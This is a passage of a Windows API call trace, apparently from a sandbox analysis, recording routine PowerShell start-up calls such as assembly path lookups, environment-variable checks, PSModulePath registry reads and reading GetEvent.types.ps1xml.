	[0727.618] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0731.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0731.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0731.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0731.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0731.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0731.443] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0731.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0731.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0731.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0731.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0733.073] CoTaskMemAlloc (cb=0x104) returned 0x3c4320
	[0733.073] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0733.073] CoTaskMemFree (pv=0x3c4320) 
	[0733.087] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x31c
	[0733.089] CoCreateGuid (in: pguid=0x1cdf70 | out: pguid=0x1cdf70*(Data1=0xbdbaa43a, Data2=0x443, Data3=0x4653, Data4=([0]=0xbd, [1]=0xbd, [2]=0x4b, [3]=0x0, [4]=0x95, [5]=0xf8, [6]=0x40, [7]=0xa1))) returned 0x0
	[0733.091] CoTaskMemAlloc (cb=0x104) returned 0x3c4320
	[0733.091] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0733.091] CoTaskMemFree (pv=0x3c4320) 
	[0733.095] WinSqmIsOptedIn () returned 0x0
	[0733.096] CoTaskMemAlloc (cb=0x104) returned 0x3c4320
	[0733.096] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0733.096] CoTaskMemFree (pv=0x3c4320) 
	[0733.097] CoTaskMemAlloc (cb=0x104) returned 0x3c4320
	[0733.097] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0733.097] CoTaskMemFree (pv=0x3c4320) 
	[0733.097] CoTaskMemAlloc (cb=0x104) returned 0x3c4320
	[0733.097] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0733.097] CoTaskMemFree (pv=0x3c4320) 
	[0733.098] CoTaskMemAlloc (cb=0x104) returned 0x3c4320
	[0733.098] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0733.098] CoTaskMemFree (pv=0x3c4320) 
	[0733.099] CoTaskMemAlloc (cb=0x104) returned 0x3c4320
	[0733.099] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0733.099] CoTaskMemFree (pv=0x3c4320) 
	[0733.100] CoTaskMemAlloc (cb=0x104) returned 0x3c4320
	[0733.100] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0733.100] CoTaskMemFree (pv=0x3c4320) 
	[0733.100] CoTaskMemAlloc (cb=0x104) returned 0x3c4320
	[0733.101] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0733.101] CoTaskMemFree (pv=0x3c4320) 
	[0733.101] CoTaskMemAlloc (cb=0x104) returned 0x3c4320
	[0733.101] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0733.101] CoTaskMemFree (pv=0x3c4320) 
	[0733.103] CoTaskMemAlloc (cb=0x104) returned 0x3c4320
	[0733.103] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0733.103] CoTaskMemFree (pv=0x3c4320) 
	[0734.393] CoTaskMemAlloc (cb=0x104) returned 0x3c4320
	[0734.393] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0734.393] CoTaskMemFree (pv=0x3c4320) 
	[0734.393] CoTaskMemAlloc (cb=0x104) returned 0x3c4320
	[0734.393] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0734.393] CoTaskMemFree (pv=0x3c4320) 
	[0734.394] CoTaskMemAlloc (cb=0x104) returned 0x3c4320
	[0734.394] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0734.394] CoTaskMemFree (pv=0x3c4320) 
	[0741.759] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0741.759] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0741.759] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0741.760] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0741.760] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0741.760] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0741.760] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0741.761] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0741.761] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0741.761] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0741.761] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0741.762] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0741.764] CoTaskMemAlloc (cb=0x104) returned 0x3c4320
	[0741.764] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x3c4320, nSize=0x80 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x75
	[0741.764] CoTaskMemFree (pv=0x3c4320) 
	[0741.766] CoTaskMemAlloc (cb=0xcc) returned 0x2883b00
	[0741.766] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x2883b00, nSize=0x64 | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerS") returned 0x76
	[0741.766] CoTaskMemFree (pv=0x2883b00) 
	[0741.766] CoTaskMemAlloc (cb=0xf0) returned 0x2880740
	[0741.766] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x2880740, nSize=0x76 | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x76
	[0741.766] CoTaskMemFree (pv=0x2880740) 
	[0741.766] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cdae8 | out: phkResult=0x1cdae8*=0x320) returned 0x0
	[0741.767] RegQueryValueExW (in: hKey=0x320, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1cda6c, lpData=0x0, lpcbData=0x1cda68*=0x0 | out: lpType=0x1cda6c*=0x2, lpData=0x0, lpcbData=0x1cda68*=0x6c) returned 0x0
	[0741.767] CoTaskMemAlloc (cb=0x70) returned 0x36e580
	[0741.767] RegQueryValueExW (in: hKey=0x320, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1cda3c, lpData=0x36e580, lpcbData=0x1cda38*=0x6c | out: lpType=0x1cda3c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x1cda38*=0x6c) returned 0x0
	[0741.767] CoTaskMemFree (pv=0x36e580) 
	[0741.767] CoTaskMemAlloc (cb=0xcc) returned 0x2883b00
	[0741.767] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x2883b00, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0741.767] CoTaskMemFree (pv=0x2883b00) 
	[0741.767] CoTaskMemAlloc (cb=0xcc) returned 0x2883b00
	[0741.767] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x2883b00, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0741.767] CoTaskMemFree (pv=0x2883b00) 
	[0741.771] RegCloseKey (hKey=0x320) returned 0x0
	[0741.771] CoTaskMemAlloc (cb=0xcc) returned 0x2883b00
	[0741.771] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x2883b00, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0741.771] CoTaskMemFree (pv=0x2883b00) 
	[0741.771] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cdae8 | out: phkResult=0x1cdae8*=0x320) returned 0x0
	[0741.771] RegQueryValueExW (in: hKey=0x320, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1cda6c, lpData=0x0, lpcbData=0x1cda68*=0x0 | out: lpType=0x1cda6c*=0x0, lpData=0x0, lpcbData=0x1cda68*=0x0) returned 0x2
	[0741.771] RegCloseKey (hKey=0x320) returned 0x0
	[0741.777] CoTaskMemAlloc (cb=0x104) returned 0x3c4320
	[0741.777] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0741.778] CoTaskMemFree (pv=0x3c4320) 
	[0741.779] CoTaskMemAlloc (cb=0x104) returned 0x3c4320
	[0741.779] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0741.779] CoTaskMemFree (pv=0x3c4320) 
	[0743.261] CoTaskMemAlloc (cb=0x104) returned 0x3c4320
	[0743.261] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0743.261] CoTaskMemFree (pv=0x3c4320) 
	[0743.262] CoTaskMemAlloc (cb=0x104) returned 0x3c4320
	[0743.262] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0743.262] CoTaskMemFree (pv=0x3c4320) 
	[0743.268] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd8d8 | out: phkResult=0x1cd8d8*=0x320) returned 0x0
	[0743.268] RegQueryValueExW (in: hKey=0x320, lpValueName="path", lpReserved=0x0, lpType=0x1cd8ec, lpData=0x0, lpcbData=0x1cd8e8*=0x0 | out: lpType=0x1cd8ec*=0x1, lpData=0x0, lpcbData=0x1cd8e8*=0x74) returned 0x0
	[0743.269] RegQueryValueExW (in: hKey=0x320, lpValueName="path", lpReserved=0x0, lpType=0x1cd85c, lpData=0x0, lpcbData=0x1cd858*=0x0 | out: lpType=0x1cd85c*=0x1, lpData=0x0, lpcbData=0x1cd858*=0x74) returned 0x0
	[0743.269] CoTaskMemAlloc (cb=0x78) returned 0x36e580
	[0743.269] RegQueryValueExW (in: hKey=0x320, lpValueName="path", lpReserved=0x0, lpType=0x1cd82c, lpData=0x36e580, lpcbData=0x1cd828*=0x74 | out: lpType=0x1cd82c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x1cd828*=0x74) returned 0x0
	[0743.269] CoTaskMemFree (pv=0x36e580) 
	[0743.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x1cd5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0743.269] SetErrorMode (uMode=0x1) returned 0x1
	[0743.269] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1cd7b0 | out: lpFileInformation=0x1cd7b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0743.270] SetErrorMode (uMode=0x1) returned 0x1
	[0743.270] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0743.270] SetErrorMode (uMode=0x1) returned 0x1
	[0743.271] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd7b0 | out: lpFileInformation=0x1cd7b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0743.271] SetErrorMode (uMode=0x1) returned 0x1
	[0743.272] CoTaskMemAlloc (cb=0x104) returned 0x3c4320
	[0743.272] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0743.272] CoTaskMemFree (pv=0x3c4320) 
	[0743.280] CoTaskMemAlloc (cb=0x104) returned 0x3c4320
	[0743.280] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4320, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0743.280] CoTaskMemFree (pv=0x3c4320) 
	[0743.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0743.287] SetErrorMode (uMode=0x1) returned 0x1
	[0743.287] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c
	[0743.287] GetFileType (hFile=0x32c) returned 0x1
	[0743.287] SetErrorMode (uMode=0x1) returned 0x1
	[0743.287] GetFileType (hFile=0x32c) returned 0x1
	[0744.568] ReadFile (in: hFile=0x32c, lpBuffer=0x2da28f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd6e8, lpOverlapped=0x0 | out: lpBuffer=0x2da28f0*, lpNumberOfBytesRead=0x1cd6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0744.570] ReadFile (in: hFile=0x32c, lpBuffer=0x2da28f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd6e8, lpOverlapped=0x0 | out: lpBuffer=0x2da28f0*, lpNumberOfBytesRead=0x1cd6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0744.571] ReadFile (in: hFile=0x32c, lpBuffer=0x2da28f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd6e8, lpOverlapped=0x0 | out: lpBuffer=0x2da28f0*, lpNumberOfBytesRead=0x1cd6e8*=0x1000, lpOverlapped=0x0) returned 1
	[0744.571] ReadFile (in: hFile=0x32c, lpBuffer=0x2da28f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd6e8, lpOverlapped=0x0 | out: lpBuffer=0x2da28f0*, lpNumberOfBytesRead=0x1cd6e8*=0xcf3, lpOverlapped=0x0) returned 1
	[0744.572] ReadFile (in: hFile=0x32c, lpBuffer=0x2da1d4b, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x1cd6e8, lpOverlapped=0x0 | out: lpBuffer=0x2da1d4b*, lpNumberOfBytesRead=0x1cd6e8*=0x0, lpOverlapped=0x0) returned 1
	[0744.572] ReadFile (in: hFile=0x32c, lpBuffer=0x2da28f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd6e8, lpOverlapped=0x0 | out: lpBuffer=0x2da28f0*, lpNumberOfBytesRead=0x1cd6e8*=0x0, lpOverlapped=0x0) returned 1
	[0744.573] CloseHandle (hObject=0x32c) returned 1
	[0744.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0744.578] SetErrorMode (uMode=0x1) returned 0x1
	[0744.578] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd660 | out: lpFileInformation=0x1cd660*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0744.578] SetErrorMode (uMode=0x1) returned 0x1
	[0744.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
